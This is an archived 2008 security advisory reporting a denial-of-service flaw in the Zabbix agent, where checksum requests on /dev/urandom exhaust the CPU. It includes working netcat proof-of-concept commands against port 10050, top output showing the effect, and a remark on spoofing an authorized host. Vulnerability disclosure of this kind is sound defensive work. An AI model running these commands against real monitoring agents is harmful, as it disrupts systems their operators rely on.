[UNIX] Zabbix (zabbix_agentd) Denial of Service
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 16 Mar 2008 14:53:28 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Zabbix (zabbix_agentd) Denial of Service
------------------------------------------------------------------------
SUMMARY
<http://www.zabbix.com/> ZABBIX offers "advanced monitoring, alerting and
visualization features today which are missing in other monitoring
systems, even some of the best commercial ones". There is some DoS issue
with Zabbix which can be exploited by a malicious user from an authorized
host.
DETAILS
An attacker on the authorized host can cause the zabbix_agentd to hang,
over-consume CPU resources.
This can be triggered by sending the agent a file checksum request
(vfs.file.cksum[file]) with file argument being some "special" device node
like /dev/zero or /dev/urandom (the latter rises kernel CPU usage even
more).
If the malicious user sends <number_of_zabbix_agentd_children> requests,
then the zabbix_agentd service will not be able to serve any requests
until it's restarted.
Here's some example session :
gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost
10050 &
[1] 24429
gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost
10050 &
[2] 24431
gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost
10050 &
[3] 24433
gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost
10050 &
[4] 24435
..and some output from top:
<snip>
Tasks: 183 total, 5 running, 178 sleeping, 0 stopped, 0 zombie
Cpu(s): 2.0%us, 97.0%sy, 1.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
<snip>
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
24381 zabbix 30 5 5056 1032 768 R 65 0.1 4:16.01 zabbix_agentd
24382 zabbix 30 5 5068 1044 776 R 50 0.1 4:12.18 zabbix_agentd
24380 zabbix 30 5 5068 1044 776 R 50 0.1 4:01.24 zabbix_agentd
24379 zabbix 30 5 5056 1036 772 R 31 0.1 4:08.24 zabbix_agentd
From this point the, zabbix_agentd accepts new connections, but does notserve them.
The malicious user needs to connect from an authorized host, but it's not
so hard to spoof it if he's on the same Ethernet segment as the host
running the zabbix_agent.
ADDITIONAL INFORMATION
The information has been provided by <mailto:mrangelov@xxxxxxxxx> Milen
Rangelov.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Microsoft Excel Rich Text Memory Corruption Vulnerability (MS08-014)
- Next by Date: [NT] Timbuktu Pro Path Traversal and Log Injection
- Previous by thread: [NT] Microsoft Excel Rich Text Memory Corruption Vulnerability (MS08-014)
- Next by thread: [NT] Timbuktu Pro Path Traversal and Log Injection
- Index(es):
Relevant Pages
- [NT] Multiple Vulnerabilities in AspDotNetStorefront
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... AspDotNetStorefront allow a remote
attacker to delete files from the ... execute uploaded files and perform cross-site-scripting
attacks. ... If a malicious user knows a ProductID has the ability to remotely delete ...
(Securiteam) - [NEWS] Mac OS X launchd Race Condition Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... During boot launchd is
invoked by the kernel to run as the first process ... ownership of this file or run code
with root privileges. ... This gives the malicious user the ability to effectively "steal"
... (Securiteam) - [UNIX] KorWeblog Directory Traversal Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... KorWeblog is a weblog application
used by many ... An input validation error allows a malicious user to exploit this ...
A patch for this vulnerability can be found at: ... (Securiteam) - [TOOL] Fast SYN Scanner (libnet, libpcap)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... struct bpf_program cfilter;
... const unsigned char *packet; ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [NT] Comersus Cart Cross-Site Scripting Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... * Comersus Cart
version 5.09 ... trust between a client and server allowing the malicious user to execute
... (Securiteam)
